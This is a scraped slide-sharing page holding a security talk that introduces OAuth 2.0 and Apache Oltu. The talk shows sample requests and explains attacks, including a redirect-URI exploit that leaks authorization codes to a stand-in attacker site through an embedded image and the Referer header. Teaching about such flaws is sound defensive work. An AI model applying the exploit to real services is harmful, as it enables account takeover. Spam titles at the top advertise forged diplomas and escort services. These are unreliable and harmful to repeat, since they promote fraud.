Call girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsCall girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girls
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac RoomVip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency Dallas
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理
 
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency""Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
 

OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu

  • 1. OAuth Hacks
 A Gentle Introduction to OAuth 2.0 and Apache Oltu 
 Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland
  • 2. Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ 9.eyJhdWQiOiJjb25uZWN0MjAxNCIsIm lzcyI6ImFzYW5zbyIsInN1YiI6ImFzYW5 zbyIsImV4cCI6MTQwMzYwMTU1OSwi aWF0IjoxNDAzNjAxNTU5fQ.9- MaGUiPg07ezuP9yAOaVLETQH6HMO pfoGwg_c0-PDw
  • 3. Who is this guy, BTW? {  Software Engineer Adobe Research Switzerland {  VP (Chair) Apache Oltu (OAuth Protocol Implementation in Java) {  Committer and PMC Member for Apache Sling {  Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty
  • 4. My (little) contribution to OAuth Not an RFC, still in the draft phase
  • 5. Agenda { Introducing OAuth 2.0 { The “OAuth dance” { Introducing Apache Oltu { Implementing OAuth 2.0 { OAuth 2.0 Implementation Vulnerabilities { OAuth 2.0 server to server ★
  • 6. Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE
  • 7. A bit of history – OAuth 1.0a
  • 8. A bit of history – OAuth 2.0 2 years X
  • 9. The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"
  • 10. The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"
  • 11. The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 :The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “…this specification is likely to produce a wide range of non-interoperable implementations.” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"
  • 12. So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)
  • 13. OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant
  • 14. OAuth Actors {  Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) { Server (Carol from Facebook) www.printondemand.biz
  • 15. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 5. Here we go Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ★
  • 16. Traditional OAuth “dance” #2- client side flow 1616 www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go ★
  • 17. Apache Oltu { 2010 - Project enters incubation with the name of Apache Amber { 2013 - Amber graduates from the incubator with the name Apache Oltu { OAuth protocol implementation in Java (OAuth client and server) { It also covers others "OAuth family" related implementations such as JWT, JWS
  • 18. How difficult is to implement OAuth ? OAuth client OAuth server
  • 19. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! Authorization Server
  • 20. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ HTTP/1.1 302 Found! Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA! ! ! Authorization Server
  • 21. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ Authorization Server
  • 22. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www-form-urlencoded! ! grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251&! redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! ! !
  • 23. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server HTTP/1.1 200 OK! Content-Type: application/json;charset=UTF-8! ! {! "access_token":"1017097752d5f18f716cc90ac8a5e4c2a9ace6b9”,! "expires_in":3600 ! }! !
  • 24. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server
  • 25. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server GET /profile/me HTTP/1.1! Host: server.oltu.com! Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9! !
  • 26. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server
  • 28. Scalable OAuth Server { derive encryption key using salt1 { derive mac key using salt2 { generate random iv { encrypt. then mac(salt1 + iv + data) { transmit salt1, salt2 iv and encrypted
  • 31. OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE ★
  • 32. Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go 7. www.printondemand.biz uses the profile information from Facebook to log in N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! * Image taken from the movie "The Devil Wears Prada"
  • 33. Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada"
  • 34. Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token a. Here we go 3. Login and authorize 4. Here the Access Token 5. Here we go www.dosomething.biz b. Give me the profile information, here is the Access Token c. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada" ★
  • 35. ✔ ✔ ✗ ✗ ✗ ✗ ✗ Attack #2 – Exploit the redirect URI aka “Lassie Come Home” * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback! Host: https://graph.facebook.com! ✔
  • 36. Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F..../..../..../ asanso/a2f05bb7e38ba6af88f8! Host: https://graph.facebook.com! * Image taken from the movie “Lassie Come Home" ✔
  • 37. Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! !
  • 38. OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 0. Generate key pair and upload public key Your application (OAuth Client) calls OAuth Server APIs on behalf of the service account, and user consent (Resource Owner) is not required (no human interaction). Why? How? 3. Here the Access Token 4. Use Access Token to call APIs ★ Register client OAuth Server 2 Server Flow
  • 39. OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow
  • 40. OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow ! curl -d 'grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt bearer! &assertion=ASSERTION' https://accounts.google.com/o/oauth2/token ! !
  • 41. References { OAuth 2.0 web site - http://oauth.net/2/ { OAuth 2.0 - http://tools.ietf.org/html/rfc6749 { Bearer Token - http://tools.ietf.org/html/rfc6750 { Apache Oltu - http://oltu.apache.org/ { http://oauth.net/articles/authentication/ { JWT - http://tools.ietf.org/html/draft-ietf-oauth-json-web-token-23 { http://intothesymmetry.blogspot.ch/